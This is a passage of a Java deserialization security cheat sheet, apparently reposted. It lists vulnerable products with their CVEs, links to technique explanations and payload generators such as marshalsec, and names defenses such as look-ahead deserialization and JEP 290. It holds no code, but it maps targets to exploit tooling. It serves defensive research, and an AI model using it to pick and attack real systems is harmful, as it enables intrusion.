protocol(60024/tcp) article Oracle Hyperion from slides Oracle Application Testing Suite CVE-2015-7501 Red Hat JBoss BPM Suite RHSA-2016-0539 CVE-2016-2510 VMWare vRealize Operations 6.0 <= version < 6.4.0 REST API VMSA-2016-0020 CVE-2016-7462 VMWare vCenter/vRealize (various) CVE-2015-6934 VMSA-2016-0005 JMX Cisco (various) List of vulnerable products CVE-2015-6420 Lexmark Markvision Enterprise CVE-2016-1487 McAfee ePolicy Orchestrator CVE-2015-8765 HP iMC CVE-2016-4372 HP Operations Orchestration CVE-2016-1997 HP Asset Manager CVE-2016-2000 HP Service Manager CVE-2016-1998 HP Operations Manager CVE-2016-1985 HP Release Control CVE-2016-1999 HP Continuous Delivery Automation CVE-2016-1986 HP P9000, XP7 Command View Advanced Edition (CVAE) Suite CVE-2016-2003 HP Network Automation CVE-2016-4385 Adobe Experience Manager CVE-2016-0958 Unify OpenScape (various) CVE-2015-8237 RMI (30xx/tcp) CVE-2015-8238 js-soc protocol (4711/tcp) Apache TomEE CVE-2015-8581 CVE-2016-0779 IBM Congnos BI CVE-2012-4858 Novell NetIQ Sentinel ? ForgeRock OpenAM 9-9.5.5, 10.0.0-10.0.2, 10.1.0-Xpress, 11.0.0-11.0.3 and 12.0.0 201505-01 F5 (various) sol30518307 Hitachi (various) HS16-010 0328_acc Apache OFBiz CVE-2016-2170 NetApp (various) CVE-2015-8545 Apache Tomcat requires local access CVE-2016-0714 Article Zimbra Collaboration version < 8.7.0 CVE-2016-3415 Apache Batchee Apache JCS Apache OpenJPA Apache OpenWebBeans Protection Look-ahead Java deserialization NotSoSerial SerialKiller ValidatingObjectInputStream Name Space Layout Randomization Some protection bypasses Tool: Serial Whitelist Application Trainer JEP 290: Filter Incoming Serialization Data in JDK 6u141, 7u131, 8u121 For Android One Class to Rule Them All: 0-Day Deserialization Vulnerabilities in Android Android Serialization Vulnerabilities Revisited XMLEncoder (XML) How it works: http://blog.diniscruz.com/2013/08/using-xmldecoder-to-execute-server-side.html Java Unmarshaller Security Payload generators: https://github.com/mbechler/marshalsec XStream (XML/JSON/various) How it works: http://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/ http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream Java Unmarshaller Security Payload generators: https://github.com/mbechler/marshalsec Vulnerable apps (without public sploits/need more info): Atlassian Bamboo CVE-2016-5229 Jenkins CVE-2017-2608 Kryo (binary) How it works: https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-1-kryo Java Unmarshaller Security Payload generators: https://github.com/mbechler/marshalsec Hessian/Burlap (binary/XML) How it works: Java Unmarshaller Security Payload generators: https://github.com/mbechler/marshalsec Castor (XML) How it works: Java Unmarshaller Security Payload generators: https://github.com/mbechler/marshalsec Vulnerable apps (without public sploits/need more info): OpenNMS NMS-9100 json-io (JSON) How it works: Java Unmarshaller Security Payload generators: https://github.com/mbechler/marshalsec Jackson (JSON) vulnerable in some configuration How it works: Java Unmarshaller Security Payload generators: https://github.com/mbechler/marshalsec Vulnerable apps (without public sploits/need more info): Apache Camel CVE-2016-8749 Red5 IO AMF (AMF) How it works: Java Unmarshaller Security Payload generators: https://github.com/mbechler/marshalsec Vulnerable apps (without public sploits/need more info): Apache 
OpenMeetings CVE-2017-5878 Apache Flex BlazeDS (AMF) How it works: AMF – Another Malicious Format Java Unmarshaller Security Payload generators: https://github.com/mbechler/marshalsec Vulnerable apps (without public sploits/need more info): Adobe ColdFusion CVE-2017-3066 <= 2016 Update 3 <= 11 update 11 <= 10 Update 22 Apache BlazeDS CVE-2017-5641 VMWare VCenter CVE-2017-5641 Flamingo AMF (AMF) How it works: AMF – Another Malicious Format GraniteDS (AMF) How it works: AMF – Another Malicious Format WebORB for Java (AMF) How it works: AMF – Another Malicious Format SnakeYAML (YAML) How it works: Java Unmarshaller Security Payload generators: https://github.com/mbechler/marshalsec Vulnerable apps (without public sploits/need more info): Resteasy CVE-2016-9606 Apache Camel CVE-2017-3159 Apache Brooklyn CVE-2016-8744 jYAML (YAML) How it works: Java Unmarshaller Security Payload generators: https://github.com/mbechler/marshalsec YamlBeans (YAML) How it works: Java Unmarshaller Security Payload generators: https://github.com/mbechler/marshalsec "Safe" deserialization Some serialization libs are safe (or almost safe) https://github.com/mbechler/marshalsec However, it's not a recomendation, but just a list of other libs that has been researched by someone: JAXB XmlBeans Jibx ProtobufGSON GWT-RPC Sursa: https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet